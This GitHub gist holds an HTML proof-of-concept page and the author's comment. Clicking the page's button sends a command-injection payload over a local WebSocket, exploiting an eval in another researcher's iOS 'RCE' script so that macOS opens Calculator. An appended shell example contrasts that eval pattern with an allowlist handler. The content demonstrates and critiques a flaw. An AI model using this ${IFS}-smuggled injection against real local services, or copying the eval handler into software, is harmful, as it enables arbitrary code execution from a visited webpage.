@matt-
Last active January 31, 2022 00:05
An RCE in the POC by Jonathan Scott for the RCE V1.0 PoC iOS 15.0.1 https://twitter.com/mattaustin/status/1447787504837398530
<!doctype html>
<html lang="en" class="h-100">
<head>
<!-- Required meta tags -->
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<!-- Bootstrap CSS -->
<link href="https://getbootstrap.com/docs/5.0/dist/css/bootstrap.min.css" rel="stylesheet" crossorigin="anonymous">
<title>RCE for the RCE</title>
<style>
/*
* Globals
*/
.bd-placeholder-img {
font-size: 1.125rem;
text-anchor: middle;
-webkit-user-select: none;
-moz-user-select: none;
user-select: none;
}
@media (min-width: 768px) {
.bd-placeholder-img-lg {
font-size: 3.5rem;
}
}
/*
* Globals
*/
/* Custom default button */
.btn-secondary,
.btn-secondary:hover,
.btn-secondary:focus {
color: #333;
text-shadow: none; /* Prevent inheritance from `body` */
}
/*
* Base structure
*/
body {
text-shadow: 0 .05rem .1rem rgba(0, 0, 0, .5);
box-shadow: inset 0 0 5rem rgba(0, 0, 0, .5);
}
.cover-container {
max-width: 42em;
}
/*
* Header
*/
.nav-masthead .nav-link {
padding: .25rem 0;
font-weight: 700;
color: rgba(255, 255, 255, .5);
background-color: transparent;
border-bottom: .25rem solid transparent;
}
.nav-masthead .nav-link:hover,
.nav-masthead .nav-link:focus {
border-bottom-color: rgba(255, 255, 255, .25);
}
.nav-masthead .nav-link + .nav-link {
margin-left: 1rem;
}
.nav-masthead .active {
color: #fff;
border-bottom-color: #fff;
}
</style>
</head>
<body class="d-flex h-100 text-center text-white bg-dark">
<div class="cover-container d-flex w-100 h-100 p-3 mx-auto flex-column">
<header class="mb-auto">
</header>
<main class="px-3 text-end">
<h1 style="font-size: 90px; color:#0000;">MA</h1>
<h1 style="font-size: 80px">Matt Austin</h1>
<p class="lead" style="color:#d0e4f8; font-size: 1.5em;">RCE for the "RCE" V1.0 PoC iOS 15.0.1 (By Jonathan Scott)<br>
Developed by <a href="https://twitter.com/mattaustin" class="text-white">Matt Austin</a></p>
<p class="lead">
<a href="#" class="btn btn-lg btn-secondary fw-bold border-white bg-white" onclick="send()">► Start</a>
</p>
</main>
<footer class="mt-auto text-white-50">
<p>© ®2021 Matt Austin by <a href="https://twitter.com/mattaustin" class="text-white">@mattaustin</a>.</p>
</footer>
</div>
<script>
let socket = new WebSocket("ws://127.0.0.1:8081/");
socket.onopen = function(e) {
console.log("[open] Connection established");
console.log("Sending to server");
};
socket.onmessage = function(event) {
console.log(`[message] Data received from server: ${event.data}`);
};
socket.onclose = function(event) {
console.log('[close] Connection died');
};
socket.onerror = function(error) {
console.log(`[error] ${error.message}`);
};
function send(){
socket.send("`open${IFS}-a${IFS}Calculator;`");
}
</script>
</body>
</html>

matt- commented Jan 3, 2022

@Hackdwerg Why not?

If you are running the fake RCE by Jonathan Scott from: https://github.com/jonathandata1/ios_15_rce
you can see that it calls an eval at: https://github.com/jonathandata1/ios_15_rce/blob/master/wsmanager.sh#L188

If you view this page (https://maustin.net/hax/rce_poc_poc.html) while running his exploit and click the button, it makes a WebSocket call at https://gist.github.com/matt-/c3028fa85d2d4f599351344ea7502865#file-index-html-L130 to exploit the eval and runs `open${IFS}-a${IFS}Calculator;` to open the Calculator on macOS.

If an attacker can create a website that executes code and makes system calls on your computer simply by viewing it, I consider it an RCE. Can you explain why you don't?
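The root cause the comment points at is a local WebSocket helper script passing each received message to `eval`, so any page that can reach `ws://127.0.0.1:8081` supplies shell code. The following is an added example written for this gist discussion, not code from the gist or from the ios_15_rce project: it contrasts that pattern with a handler that treats the message as data and dispatches on an allowlist. The function names, the `ping`/`status`/`open:` message vocabulary and the sample payloads are all constructed for illustration.

```shell
#!/bin/sh
# Added example: message handling for a local WebSocket helper in POSIX sh.
# vulnerable_handle mirrors the eval pattern the comment describes and is
# never invoked here; safe_handle is the hardened replacement.

vulnerable_handle() {
  # Defect: the message body becomes shell code. "${IFS}" lets a payload
  # with no literal spaces still split into words once eval runs it.
  eval "$1"
}

# Hardened handler: dispatch on an allowlist of message shapes.
# Prints the action for a known message and returns 0; returns 1 otherwise.
safe_handle() {
  msg=$1
  case $msg in
    ping)   echo "pong" ;;
    status) echo "status: ok" ;;
    open:*)
      app=${msg#open:}
      # Only a plain application name is accepted; any character outside the
      # allowed set (so $, `, ;, whitespace, ...) rejects the whole message.
      case $app in
        ''|*[!A-Za-z0-9_.-]*) printf 'rejected app name: %s\n' "$app" >&2; return 1 ;;
      esac
      # Demonstration only: echo the validated command instead of executing it.
      echo "would run: open -a $app"
      ;;
    *)
      # Everything else is logged as data and refused, never evaluated.
      printf 'rejected unexpected message: %s\n' "$msg" >&2
      return 1
      ;;
  esac
}

# Convenience wrapper: success exit status iff the message is acceptable.
is_allowed() {
  safe_handle "$1" >/dev/null 2>&1
}
```

Feeding the gist's own payload to `is_allowed` fails, because the backticks and `${IFS}` never reach a shell parser.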
